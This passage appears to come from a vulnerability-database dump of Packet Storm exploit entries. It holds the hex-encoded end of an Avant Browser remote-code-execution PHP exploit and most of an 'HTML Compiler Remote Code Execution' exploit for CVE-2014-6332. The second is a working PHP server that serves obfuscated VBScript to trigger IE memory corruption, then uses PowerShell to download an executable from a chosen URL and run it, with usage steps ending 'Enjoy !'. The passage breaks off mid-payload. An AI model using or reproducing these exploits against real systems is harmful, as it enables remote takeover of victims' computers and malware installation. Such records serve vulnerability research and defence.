0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x74\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134053/avantbrowser-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:18:38", "description": "", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "packetstorm", "title": "HTML Compiler Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-22T00:00:00", "id": "PACKETSTORM:134062", "href": "https://packetstormsecurity.com/files/134062/HTML-Compiler-Remote-Code-Execution.html", "sourceData": "` \n#!/usr/bin/php \n<?php \n########################################################## \n# Title : HTML Compiler Remote Code Execution \n# HTML Compiler is a program that allows you to put an entire HTML application into a standalone Windows application. \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n########################################################## \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://html-compiler.en.softonic.com/ \n# Website : http://htmlcompiler.com/ \n########################################################## \n# 1 . run php code : php exploit.php \n# 2 . open \"HTML Compiler\" \n# 3 . File -> New Project -> Choose here your site index file \n# 4 . browse loader.html \n# 5 . Enjoy ! \n########################################################## \n# loader.html source code : \n# \n# <html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=[Your IP Address]\"></head></html> \n########################################################## \n# proof : http://ehsann.info/proof/HTML_Compiler_Remote_Code_Execute.png \n########################################################## \n \nprint \"Exploit Started ! \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\